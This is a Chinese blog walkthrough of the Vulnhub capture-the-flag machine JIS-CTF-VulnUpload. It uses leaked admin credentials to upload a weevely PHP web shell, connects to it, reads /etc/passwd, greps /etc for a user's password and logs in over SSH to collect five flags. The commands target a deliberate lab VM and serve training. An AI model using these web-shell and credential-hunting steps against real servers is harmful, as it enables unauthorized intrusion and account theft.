不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

Vulnhub靶场渗透(JIS-CTF-VulnUpload)

环境介绍~渗透准备一个靶机、两台攻击机。JIS-CTF-VulnUpload靶机、Mac、kali2020VM名称:JIS-CTF:VulnUpload
说明:本机上有五个flag。尝试找到它们。查找所有标志平均需要1.5个小时。

ps:此处有坑,在运行vm靶机环境的时候一直获取不到ip地址,报Failed to start Raise network interfaces当然前提是要登录靶机, 解决方法在下面

  • 账号 technawi
  • 口令 3vilH@ksor

# 启用网卡
sudo ifconfig ens33 up
# 分配IP
sudo dhclient

渗透过程1、端口扫描
2、目录扫描
3、寻找flag
靶机地址为192.168.0.108,开放端口及服务:80 http、22 ssh。且发现web下存在robots.txt文件。于是,访问该地址80端口。
前期准备工作中,发现robots.txt文件,于是先访问。
一眼就看到了flag,先搞下来看看
The 1st flag is : {8734509128730458630012095}
第一个FLAG到手
继续寻找。。。。。出现not work ,什么鬼,查找网页源代码,第二个flag到手!
username : adminpassword : 3v1l_H@ck3r
The 2nd flag is : {7412574125871236547895214}
第二个FLAG到手
顺便得到了账号密码,估计是后台的,试试登录下,果然成功。
一看就是文件上传,于是我们利用weevely来生成一个木马,进行上传。
weevely generate shell /home/harvey/桌面/shell.php
用kali的话,一样子的。
shell制作完成,上传!
上传完成,去看一下。先打开uploads页面试试,404.。。。那就是在uploaded_files里了。
果然,没有报错,继续查看shell
发现是可以访问的,没有404,说明可以访问我们的木马,紧接着我们连接我们的木马
weevely http://10.0.10.221/uploaded_files/shell.php shell
ls翻翻,在往上遍历看看。
第一反应,打开flag.txt。。。然而没有权限访问。。。接着打开hint.txt,惊喜的发现第三个flag!
The 3rd flag is : {7645110034526579012345670}
第三个FLAG到手
拿到第三个flag,同时也提示了下一步如何操作,英文翻译过来就是让我们去找technawi用户的密码然后读取flag.txt,这个东西在一个很隐蔽的地方,既然这个technawi是用户,那就看一下用户列表,technawi也在里面
cat /etc/passwd
接下来就是在etc文件中搜索这个包含technawi关键字的文件了,命令行输入:
grep -rns technawi /etc/
显眼的第三行,抓过来看看👀~哇哦,得到了第四个flag,以及账号密码。
The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor
第四个FLAG到手
4、连接ssh(root提权)
拿到了账号密码,咱们提权(root)去。
输入python -c ‘import pty;pty.spawn(“/bin/bash”)’
貌似不成功,但是22端口开放,于是ssh链接
ssh -p22 technawi@192.168.0.108
输入密码后成功登陆
最后,打开之前的flag.txt~至此第5个flag到手!
The 5th flag is : {5473215946785213456975249}
至此。5个FLAG全部寻找完成!
5、总结
做完这个靶机感觉并不难,主要是考验一些比较基本的知识以及灵活的运用。
赞(0)
未经允许不得转载:seo优化_前端开发_渗透技术 » Vulnhub靶场渗透(JIS-CTF-VulnUpload)